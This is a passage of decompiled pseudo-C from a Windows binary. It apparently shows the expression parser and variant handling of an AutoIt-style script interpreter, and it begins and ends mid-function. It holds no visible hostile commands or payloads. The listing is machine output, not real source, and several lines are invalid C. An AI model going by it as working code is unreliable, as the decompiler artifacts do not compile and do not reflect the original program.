                                  										_t575 = _t575 + 8;
                                  									} else {
                                  										__eflags = _t411 - 0xc;
                                  										if(_t411 == 0xc) {
                                  											_t422 =  *_t563;
                                  											__eflags = _t422;
                                  											if(_t422 != 0) {
                                  												E0044B3D9(_t422);
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L29:
                                  							 *(_t563 + 8) = 1;
                                  							 *_t563 = 0;
                                  							_t546 =  *0x4a95f8; // 0x1
                                  							 *(_t563 + 8) = _t546;
                                  							_t413 =  *0x4a95f8; // 0x1
                                  							__eflags = _t413 - 1;
                                  							if(_t413 != 1) {
                                  								_t414 = _t413 - 1;
                                  								__eflags = _t414 - 0xb;
                                  								if(__eflags > 0) {
                                  									goto L31;
                                  								}
                                  								switch( *((intOrPtr*)(_t414 * 4 +  &M0042BCDE))) {
                                  									case 0:
                                  										goto L30;
                                  									case 1:
                                  										 *_t563 =  *0x4a95f0;
                                  										 *((intOrPtr*)(_t563 + 4)) =  *0x4a95f4;
                                  										goto L31;
                                  									case 2:
                                  										__fp0 =  *0x4a95f0;
                                  										 *__esi = __fp0;
                                  										goto L31;
                                  									case 3:
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											 *(__esi + 0xc) = 0;
                                  										} else {
                                  											__ecx =  *0x4a95fc;
                                  											__edx =  *__ecx;
                                  											 *__eax =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											 *(__eax + 4) =  *(__ecx + 4);
                                  											__edx =  *(__ecx + 8);
                                  											 *(__eax + 8) = __edx;
                                  											__ecx =  *(__ecx + 0xc);
                                  											 *(__eax + 0xc) = __ecx;
                                  											 *__ecx = 1 +  *__ecx;
                                  											 *(__esi + 0xc) = __eax;
                                  										}
                                  										goto L31;
                                  									case 4:
                                  										_push(0x214);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											__esi =  *0x4a95f0;
                                  											__ebx = _v124;
                                  											__ecx = 0x85;
                                  											__edi = __eax;
                                  											__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  											__esi + __ecx = __esi + __ecx + __ecx;
                                  											__ecx = 0;
                                  											__esi = _v128;
                                  											__edi = _a8;
                                  										}
                                  										 *__esi = __eax;
                                  										__eflags =  *(__eax + 4);
                                  										if( *(__eax + 4) != 0) {
                                  											__eax =  *(__eax + 4);
                                  											 *__eax = 1 +  *__eax;
                                  										}
                                  										goto L31;
                                  									case 5:
                                  										__eax =  *0x4a95f0;
                                  										 *__esi = __eax;
                                  										goto L31;
                                  									case 6:
                                  										__ecx =  *0x4a95f0;
                                  										 *__esi =  *0x4a95f0;
                                  										goto L31;
                                  									case 7:
                                  										__eflags =  *0x4a95f0;
                                  										if(__eflags != 0) {
                                  											_push(0x10);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__esp = __esp + 4;
                                  											_push(__eax);
                                  											 *__esi = __eax;
                                  											__imp__#8();
                                  											__edx =  *0x4a95f0;
                                  											__eax =  *__esi;
                                  											_push(__edx);
                                  											_push(__eax);
                                  											__imp__#10();
                                  											__eflags = __eax;
                                  											if(__eax < 0) {
                                  												__ecx =  *__esi;
                                  												_push( *__esi);
                                  												__imp__#9();
                                  												__edx =  *__esi;
                                  												_push(__edx);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												 *__esi = 0;
                                  											}
                                  										}
                                  										goto L31;
                                  									case 8:
                                  										__al =  *0x4a95f0;
                                  										 *__esi = __al;
                                  										goto L31;
                                  									case 9:
                                  										_push(0x18);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											goto L255;
                                  										}
                                  										__ecx =  *0x4a95f0;
                                  										__eax = E0044B8A3(__eax,  *0x4a95f0);
                                  										 *__esi = __eax;
                                  										goto L31;
                                  									case 0xa:
                                  										_push(8);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										 *__esi = __eax;
                                  										__edx =  *0x4a95f0;
                                  										__ecx =  *( *0x4a95f0);
                                  										 *__eax =  *( *0x4a95f0);
                                  										__edx =  *__esi;
                                  										__eax =  *( *__esi);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											_push(1);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__edx =  *__esi;
                                  											__eax =  *(__edx + 4);
                                  											__esp = __esp + 4;
                                  											 *__eax = 0;
                                  										} else {
                                  											_push(__eax);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__eax =  *__esi;
                                  											__edx =  *__eax;
                                  											__ecx =  *0x4a95f0;
                                  											__eax =  *(__eax + 4);
                                  											__esp = __esp + 4;
                                  											__edx =  *( *0x4a95f0 + 4);
                                  											__eax = E00410E60(__eax,  *( *0x4a95f0 + 4),  *( *0x4a95f0 + 4));
                                  										}
                                  										goto L31;
                                  									case 0xb:
                                  										_push(0x14);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											L255:
                                  											__eax = 0;
                                  											 *__esi = 0;
                                  											goto L31;
                                  										}
                                  										__ecx =  *0x4a95f0;
                                  										__eax = E00470870(__eax,  *0x4a95f0);
                                  										 *__esi = __eax;
                                  										goto L31;
                                  								}
                                  							}
                                  							L30:
                                  							_t547 =  *0x4a95f0; // 0x0
                                  							 *_t563 = _t547;
                                  							goto L31;
                                  						}
                                  					}
                                  					if(_t491 < 0x37 || _t491 >= 0x41) {
                                  						__eflags = _t491 - 5;
                                  						if(_t491 != 5) {
                                  							__eflags = _t491 - 0x51;
                                  							if(_t491 > 0x51) {
                                  								goto L9;
                                  							}
                                  							_t88 = _t491 + 0x40af4c; // 0xec
                                  							switch( *((intOrPtr*)(( *_t88 & 0x000000ff) * 4 +  &M0040AEEC))) {
                                  								case 0:
                                  									__eax =  *__eax;
                                  									__eflags = __eax - 4;
                                  									if(__eax < 4) {
                                  										L129:
                                  										__eflags = __eax - 1;
                                  										if(__eax != 1) {
                                  											__eax = __eax - 2;
                                  											__eflags = __eax - 0x27;
                                  											if(__eflags > 0) {
                                  												goto L9;
                                  											}
                                  											__eax =  *(__eax + 0x42bc86) & 0x000000ff;
                                  											switch( *((intOrPtr*)(__eax * 4 +  &M0042BC6E))) {
                                  												case 0:
                                  													__ecx = 1 + __ecx;
                                  													__ebx = 8;
                                  													 *__edi = __ecx;
                                  													goto L10;
                                  												case 1:
                                  													__ecx = 1 + __ecx;
                                  													__ebx = 0xa;
                                  													 *__edi = __ecx;
                                  													goto L10;
                                  												case 2:
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v128;
                                  													_v108 = 0x16;
                                  													__eax = E0040BC10(0x4a95f0,  &_v128);
                                  													_v72 = 1;
                                  													__edx = _v72;
                                  													_push(__edx);
                                  													goto L170;
                                  												case 3:
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v128;
                                  													_v108 = 0x16;
                                  													__eax = E0040BC10(0x4a95f0,  &_v128);
                                  													_v80 = 0;
                                  													__ecx = _v80;
                                  													_push(__ecx);
                                  													L170:
                                  													__eax =  &_v128;
                                  													_push(E0040D0B0( &_v128));
                                  													__eax = E004530C9();
                                  													__edi = _a8;
                                  													 *__edi = 1 +  *__edi;
                                  													__esi = _v136;
                                  													goto L4;
                                  												case 4:
                                  													__esp = __esp - 0x10;
                                  													__edi = L"Default";
                                  													__esi = __esp;
                                  													_v108 = 0x16;
                                  													E00401B10(L"Default", __esp, __eflags) =  &_v28;
                                  													_push( &_v28);
                                  													__eax = E0044B8D4();
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v148;
                                  													__eax = E0040BC10(0x4a95f0, __esi);
                                  													__ecx =  &_v48;
                                  													__esi = E0040D0B0(__esi);
                                  													__eax = _a8;
                                  													 *_a8 = 1 +  *_a8;
                                  													__ecx =  &_v48;
                                  													__eax = E00402250(__ecx);
                                  													__esi = _v156;
                                  													__edi = _a8;
                                  													goto L4;
                                  												case 5:
                                  													goto L9;
                                  											}
                                  										}
                                  										__ecx = 1 + __ecx;
                                  										__ebx = __eax + 6;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									__eflags = __eax - 0x27;
                                  									if(__eax < 0x27) {
                                  										goto L9;
                                  									}
                                  									goto L129;
                                  								case 1:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__eflags = _v124 - 1;
                                  									if(_v124 != 1) {
                                  										__eflags = _v115;
                                  										if(_v115 == 0) {
                                  											__eax = _v120;
                                  										} else {
                                  											__ecx = _v120;
                                  											__eax =  *(_v120 + 0x10);
                                  										}
                                  									} else {
                                  										__eax = _v128;
                                  									}
                                  									__edx = _a4;
                                  									__ebx = _v112;
                                  									__eax = _a8;
                                  									__eax = E00408CC0(_a8, __ebx, __edx, __fp0, _a8); // executed
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										goto L285;
                                  									} else {
                                  										__eflags =  *((intOrPtr*)(__ebx + 0xf8)) - 1;
                                  										if( *((intOrPtr*)(__ebx + 0xf8)) == 1) {
                                  											goto L285;
                                  										}
                                  										__esi = _v128;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  								case 2:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edi = _a8;
                                  									__edx = _a4;
                                  									__ecx =  *__edi;
                                  									__eax =  *((intOrPtr*)(_a4 + 4));
                                  									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  									__ecx =  *(__eax + 4);
                                  									__ebx =  *__eax;
                                  									__eax = __esi;
                                  									_v32 = __ecx;
                                  									__esi = E0040D0B0(__esi);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__edx = _v32;
                                  									 *(__esi + 8) = 2;
                                  									 *__esi = __ebx;
                                  									 *(__esi + 4) = __edx;
                                  									 *__edi = 1 +  *__edi;
                                  									__esi = _v128;
                                  									goto L4;
                                  								case 3:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edi = _a8;
                                  									__ecx = _a4;
                                  									__eax =  *__edi;
                                  									__edx =  *((intOrPtr*)(_a4 + 4));
                                  									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  									__fp0 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
                                  									__eax = __esi;
                                  									_v136 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
                                  									__esi = E0040D0B0(__esi);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__fp0 = _v136;
                                  									 *__esi = __fp0;
                                  									 *(__esi + 8) = 3;
                                  									 *__edi = 1 +  *__edi;
                                  									__esi = _v128;
                                  									goto L4;
                                  								case 4:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__esi = _a8;
                                  									__eax =  *__esi;
                                  									__edi = _a4;
                                  									__ecx = __eax + 1;
                                  									 *__esi = __eax + 1;
                                  									__edx =  *(__edi + 4);
                                  									__eax =  *( *(__edi + 4) + __eax * 4);
                                  									__eax =  *__eax;
                                  									__edx =  *__eax;
                                  									__esp = __esp - 0x10;
                                  									 *__esp =  *__eax;
                                  									__edx =  *(__eax + 4);
                                  									_v160 =  *(__eax + 4);
                                  									__edx =  *(__eax + 8);
                                  									_v156 =  *(__eax + 8);
                                  									__eax =  *(__eax + 0xc);
                                  									_v152 = __eax;
                                  									 *__eax = 1 +  *__eax;
                                  									__eax =  &_v128;
                                  									__eax = E0040D0B0( &_v128);
                                  									__ebx = _v112;
                                  									_push(__eax);
                                  									_push(__ebx);
                                  									__eax = E004720DB(__eflags, __fp0);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										__eax =  *__esi;
                                  										__ecx =  *(__edi + 4);
                                  										__edx =  *( *(__edi + 4) +  *__esi * 4 - 4);
                                  										 *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)) = E0045E737(__fp0, __ebx, 0x86,  *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)));
                                  										L285:
                                  										__ecx =  &_v128;
                                  										_push( &_v128);
                                  										goto L296;
                                  									}
                                  									__esi = _v128;
                                  									__edi = _a8;
                                  									_v108 = 0x16;
                                  									goto L4;
                                  								case 5:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__eflags = _v124 - 1;
                                  									if(__eflags != 0) {
                                  										__eflags = _v115;
                                  										if(__eflags != 0) {
                                  											__ecx = _v120;
                                  											__eax =  *(_v120 + 0x10);
                                  										} else {
                                  											__eax = _v120;
                                  										}
                                  									} else {
                                  										__eax = _v128;
                                  									}
                                  									__edx = _a4;
                                  									__eax = _v112;
                                  									__eax = _a8;
                                  									__eax = E0040C1F0(_a8, __eflags, __fp0, _v112, _a4, _a8);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										__eax =  &_v128;
                                  										_push( &_v128);
                                  										goto L296;
                                  									} else {
                                  										__esi = _v128;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  								case 6:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edx =  &_v85;
                                  									__esi = E0040D0B0(__esi);
                                  									__esi = _v112;
                                  									__eax = _a4;
                                  									__eax = _a8;
                                  									__eax = E004096A0(_a8, __eflags, __fp0, __esi, _a4, _a8,  &_v85);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										goto L295;
                                  									}
                                  									__eflags =  *((intOrPtr*)(__esi + 0xf8)) - 1;
                                  									if( *((intOrPtr*)(__esi + 0xf8)) == 1) {
                                  										goto L295;
                                  									}
                                  									__esi = _v128;
                                  									__edi = _a8;
                                  									_v108 = 0x16;
                                  									goto L4;
                                  								case 7:
                                  									__eflags = __ecx;
                                  									if(__ecx == 0) {
                                  										L177:
                                  										__esi = _v112;
                                  										__edx = __esi + 0x488;
                                  										__eax = E00432416(__edx);
                                  										__eflags = __al;
                                  										if(__al == 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0xa7,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__ecx =  &_v140;
                                  											_push( &_v140);
                                  											goto L296;
                                  										}
                                  										__eax = 0;
                                  										__esp = __esp - 0x10;
                                  										_v68 = 0;
                                  										_v56 = 0;
                                  										__eax = __edx;
                                  										__ebx = __esp;
                                  										_v60 = 1;
                                  										__eax = E0040B960(__edx, __ebx, __ecx, __edi);
                                  										__ecx = _a4;
                                  										__eax =  &_v68;
                                  										_push( &_v68);
                                  										_push(__edi);
                                  										_push(_a4);
                                  										__ecx = __esi;
                                  										__eax = E0047E250(__esi, __eflags, __fp0);
                                  										__eflags = __eax;
                                  										if(__eax != 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0x6e,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__esi =  &_v92;
                                  											goto L294;
                                  										}
                                  										__edi =  &_v80;
                                  										__esi =  &_v140;
                                  										_v120 = 0x16;
                                  										__eax = E0040BC10(__edi,  &_v140);
                                  										__esi = __edi;
                                  										__eax = E00408F40(__edi, __edi);
                                  										__esi = _v140;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  									__eax =  *(__edx + 8) & 0x0000ffff;
                                  									__eflags = __ax - 0x33;
                                  									if(__ax == 0x33) {
                                  										L175:
                                  										__ebx = _v112;
                                  										__eax = E00451B42(__ebx, 0xa9, 0, L"Variable must be of type \'Object\'.", 1);
                                  										__eflags = __eax;
                                  										if(__eax != 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __ebx, 0xa9,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__ecx =  &_v140;
                                  											_push( &_v140);
                                  											goto L296;
                                  										}
                                  										 *__edi = 1 +  *__edi;
                                  										goto L4;
                                  									}
                                  									__eflags = __ax - 0x35;
                                  									if(__ax != 0x35) {
                                  										goto L177;
                                  									}
                                  									goto L175;
                                  								case 8:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 5;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 9:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 1;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xa:
                                  									__ebx = 0;
                                  									__ecx = 1 + __ecx;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xb:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 4;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xc:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 3;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xd:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 2;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xe:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0x12;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xf:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0x13;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x10:
                                  									__eax = _v108;
                                  									__eflags = __eax - 0x16;
                                  									if(__eax != 0x16) {
                                  										__eflags = __eax - 0x13;
                                  										if(__eax == 0x13) {
                                  											goto L89;
                                  										}
                                  										__ebx = 0x11;
                                  										L90:
                                  										__ecx = 1 + __ecx;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									L89:
                                  									__ebx = 0xb;
                                  									goto L90;
                                  								case 0x11:
                                  									__eax = _v108;
                                  									__eflags = __eax - 0x16;
                                  									if(__eax == 0x16) {
                                  										L155:
                                  										__ebx = 0xc;
                                  										L156:
                                  										__ecx = 1 + __ecx;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									__ebx = 0x10;
                                  									__eflags = __eax - 0x13;
                                  									if(__eax != 0x13) {
                                  										goto L156;
                                  									}
                                  									goto L155;
                                  								case 0x12:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0xe;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x13:
                                  									_t490 = 0xd;
                                  									 *_t559 = 1 + _t508;
                                  									goto L10;
                                  								case 0x14:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 9;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x15:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 6;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x16:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0xf;
                                  									 *__edi = __ecx;
                                  									L10:
                                  									_v136 = _t490;
                                  									_v108 = _t490;
                                  									do {
                                  										_t509 = _v95;
                                  										_t564 = _v100;
                                  										if(_t509 != 0) {
                                  											_t375 = _t564[1];
                                  										} else {
                                  											_t375 = _t564;
                                  										}
                                  										_t378 =  *( *_t375 * 0x15 + _t490 + 0x4918f0) & 0x000000ff;
                                  										if(_t378 != 3) {
                                  											__eflags = _t378 - 6;
                                  											if(_t378 > 6) {
                                  												L71:
                                  												__eflags = _t490 - 7;
                                  												if(_t490 == 7) {
                                  													L134:
                                  													__eflags = _v124;
                                  													if(_v124 == 0) {
                                  														L73:
                                  														_t563 = _v128;
                                  														while(1) {
                                  															L4:
                                  															_t508 =  *_t559;
                                  															if(_t508 == _a16) {
                                  																goto L9;
                                  															}
                                  															goto L5;
                                  														}
                                  														goto L9;
                                  													}
                                  													E0040B960(E0040D0B0( &_v128),  &_v52, _t509, _t559);
                                  													_t465 = E0040CE70( &_v52);
                                  													__eflags = _t465;
                                  													if(_t465 == 0) {
                                  														L276:
                                  														__eflags = _v136 - 7;
                                  														if(_v136 != 7) {
                                  															L138:
                                  															E00408F40(_t559,  &_v52);
                                  															_t563 = _v128;
                                  															goto L4;
                                  														}
                                  														_t566 = 8;
                                  														L278:
                                  														_t468 = E00441DB4(_a4, _t559);
                                  														__eflags = _t468;
                                  														if(_t468 != 0) {
                                  															E0045E737(_t594, _v112, 0x6e, _v92);
                                  															_t567 =  &_v64;
                                  															L294:
                                  															E00408F40(_t559, _t567);
                                  															L295:
                                  															_push( &_v128);
                                  															L296:
                                  															E0044B92D();
                                  															E004107C0( &_v108);
                                  															_t475 = 1;
                                  															L20:
                                  															return _t475;
                                  														}
                                  														_t476 =  &_v128;
                                  														__eflags = _v136 - _t566;
                                  														if(_v136 != _t566) {
                                  															_v76 = 0;
                                  															_push(_v76);
                                  														} else {
                                  															_v84 = 1;
                                  															_push(_v84);
                                  														}
                                  														_push(E0040D0B0(_t476));
                                  														E004530C9();
                                  														E0040BE70( &_v112);
                                  														goto L138;
                                  													}
                                  													_t566 = 8;
                                  													__eflags = _v136 - 8;
                                  													if(_v136 == 8) {
                                  														goto L278;
                                  													}
                                  													__eflags = _t465;
                                  													if(_t465 == 0) {
                                  														goto L276;
                                  													}
                                  													goto L138;
                                  												}
                                  												__eflags = _t490 - 8;
                                  												if(_t490 == 8) {
                                  													goto L134;
                                  												}
                                  												goto L73;
                                  											}
                                  											switch( *((intOrPtr*)(_t378 * 4 +  &M0040AED0))) {
                                  												case 0:
                                  													__eflags = _t509;
                                  													if(__eflags != 0) {
                                  														 *_t564 = _t490;
                                  														_v95 = 0;
                                  													} else {
                                  														_push(8);
                                  														_t480 = E004115D7(_t559, _t564, __eflags);
                                  														_t575 = _t575 + 4;
                                  														__eflags = _t480;
                                  														if(_t480 == 0) {
                                  															_t480 = 0;
                                  														} else {
                                  															 *_t480 = _t490;
                                  														}
                                  														 *(_t480 + 4) = _t564;
                                  														_v100 = _t480;
                                  													}
                                  													_t85 =  &_v104;
                                  													 *_t85 = _v104 + 1;
                                  													__eflags =  *_t85;
                                  													goto L71;
                                  												case 1:
                                  													goto L84;
                                  												case 2:
                                  													while(1) {
                                  														__edx = _v100;
                                  														__eflags = __cl;
                                  														if(__cl == 0) {
                                  															__eax = __edx;
                                  														} else {
                                  															__eax =  *(__edx + 4);
                                  														}
                                  														__eflags =  *__eax - 0x12;
                                  														if( *__eax == 0x12) {
                                  															break;
                                  														}
                                  														__eflags = __cl;
                                  														if(__cl == 0) {
                                  															__eax = __edx;
                                  														} else {
                                  															__eax =  *(__edx + 4);
                                  														}
                                  														__eflags =  *__eax - 0x14;
                                  														if( *__eax == 0x14) {
                                  															goto L290;
                                  														} else {
                                  															__edx =  &_v128;
                                  															__eax =  &_v104;
                                  															__eax = E0040B5F0( &_v104, __fp0,  &_v128);
                                  															__eflags = __eax;
                                  															if(__eax != 0) {
                                  																goto L289;
                                  															} else {
                                  																__cl = _v95;
                                  																continue;
                                  															}
                                  														}
                                  													}
                                  													__esi =  &_v104;
                                  													__eax = E0040BE70(__esi);
                                  													goto L71;
                                  												case 3:
                                  													goto L71;
                                  												case 4:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6b, _v92);
                                  													goto L295;
                                  												case 5:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6c, _v92);
                                  													goto L295;
                                  												case 6:
                                  													L290:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6d, _v92);
                                  													goto L295;
                                  											}
                                  										}
                                  										if(_v124 != 1) {
                                  											break;
                                  										}
                                  										_t483 = _v120;
                                  										if(_t483 != 0) {
                                  											_t570 = _t483;
                                  											do {
                                  												_t561 =  *(_t570 + 0x10);
                                  												E00408F40(_t561, _t570);
                                  												_push(_t570);
                                  												E004111DC();
                                  												_t575 = _t575 + 4;
                                  												_t570 = _t561;
                                  												__eflags = _t561;
                                  											} while (_t561 != 0);
                                  										}
                                  										_t486 = _v100;
                                  										if(_t486 == 0) {
                                  											L19:
                                  											_t475 = 0;
                                  											goto L20;
                                  										} else {
                                  											do {
                                  												_t571 =  *(_t486 + 4);
                                  												_push(_t486);
                                  												E004111DC();
                                  												_t575 = _t575 + 4;
                                  												_t486 = _t571;
                                  											} while (_t571 != 0);
                                  											goto L19;
                                  										}
                                  										L84:
                                  										__ecx =  &_v128;
                                  										__eax =  &_v104;
                                  										__eax = E0040B5F0( &_v104, __fp0,  &_v128);
                                  										__eflags = __eax;
                                  									} while (__eax == 0);
                                  									L289:
                                  									E0045E737(_t594, _v112, 0x6e, _v92);
                                  									goto L295;
                                  								case 0x17:
                                  									goto L9;
                                  							}
                                  						}
                                  						_t499 = _v124;
                                  						_v108 = 0x16;
                                  						__eflags = _t499;
                                  						if(_t499 != 0) {
                                  							__eflags = _v115;
                                  							if(__eflags != 0) {
                                  								E00408E80(_v120, _t508, 0x4a95f0);
                                  								_t499 = _v128;
                                  								_v119 = 0;
                                  							} else {
                                  								_push(0x18);
                                  								_t442 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t442;
                                  								if(_t442 == 0) {
                                  									_t443 = 0;
                                  								} else {
                                  									_v136 = _t442;
                                  									_t503 = _v136;
                                  									E0040B960(0x4a95f0, _t503, _t508, _t559);
                                  									_t443 = _t503;
                                  									_t499 = _v124;
                                  								}
                                  								 *((intOrPtr*)(_t443 + 0x10)) = _v120;
                                  								_v120 = _t443;
                                  							}
                                  							L55:
                                  							_t427 =  *( *(_a4 + 4) +  *_t559 * 4);
                                  							_t501 = _t499 + 1;
                                  							_v124 = _t501;
                                  							__eflags = _t501 - 1;
                                  							if(_t501 != 1) {
                                  								__eflags = _v115;
                                  								if(_v115 != 0) {
                                  									_t502 =  *(_v120 + 0x10);
                                  								} else {
                                  									_t502 = _v120;
                                  								}
                                  							} else {
                                  								_t502 = _t563;
                                  							}
                                  							_t531 =  *_t427;
                                  							_t428 = _t502[3];
                                  							_v136 = _t531;
                                  							__eflags = _t428;
                                  							if(_t428 != 0) {
                                  								E004431AD(_t428);
                                  								_t531 = _v140;
                                  								_t502[3] = 0;
                                  							}
                                  							_t430 = _t502[2];
                                  							__eflags = _t430 - 8;
                                  							if(_t430 == 8) {
                                  								_t551 =  *_t502;
                                  								__eflags = _t551;
                                  								if(_t551 == 0) {
                                  									goto L59;
                                  								}
                                  								__imp__#9(_t551);
                                  								_push( *_t502);
                                  								E004111DC();
                                  								_t531 = _v140;
                                  								_t575 = _t575 + 4;
                                  								goto L63;
                                  							} else {
                                  								L59:
                                  								__eflags = _t430 - 0xa;
                                  								if(_t430 == 0xa) {
                                  									_t431 =  *_t502;
                                  									__eflags = _t431;
                                  									if(_t431 != 0) {
                                  										E0044318E(_t431);
                                  										_t531 = _v140;
                                  									}
                                  								} else {
                                  									__eflags = _t430 - 5;
                                  									if(_t430 == 5) {
                                  										E0040E270(_t502, _t563);
                                  										_t531 = _v136;
                                  									} else {
                                  										__eflags = _t430 - 0xb;
                                  										if(_t430 == 0xb) {
                                  											_push( *((intOrPtr*)( *_t502 + 4)));
                                  											E004111DC();
                                  											_push( *_t502);
                                  											E004111DC();
                                  											_t531 = _v136;
                                  											_t575 = _t575 + 8;
                                  										} else {
                                  											__eflags = _t430 - 0xc;
                                  											if(_t430 == 0xc) {
                                  												_t438 =  *_t502;
                                  												__eflags = _t438;
                                  												if(_t438 != 0) {
                                  													E0044B3D9(_t438);
                                  													_t531 = _v140;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								L63:
                                  								_t502[2] = 1;
                                  								 *_t502 = _t531;
                                  								 *_t559 = 1 +  *_t559;
                                  								continue;
                                  							}
                                  						}
                                  						__eflags = _t563 - 0x4a95f0;
                                  						if(_t563 == 0x4a95f0) {
                                  							goto L55;
                                  						}
                                  						_t446 =  *(_t563 + 0xc);
                                  						__eflags = _t446;
                                  						if(_t446 != 0) {
                                  							E004431AD(_t446);
                                  							 *(_t563 + 0xc) = 0;
                                  						}
                                  						_t448 =  *(_t563 + 8);
                                  						__eflags = _t448 - 8;
                                  						if(_t448 == 8) {
                                  							_t534 =  *_t563;
                                  							__eflags = _t534;
                                  							if(_t534 == 0) {
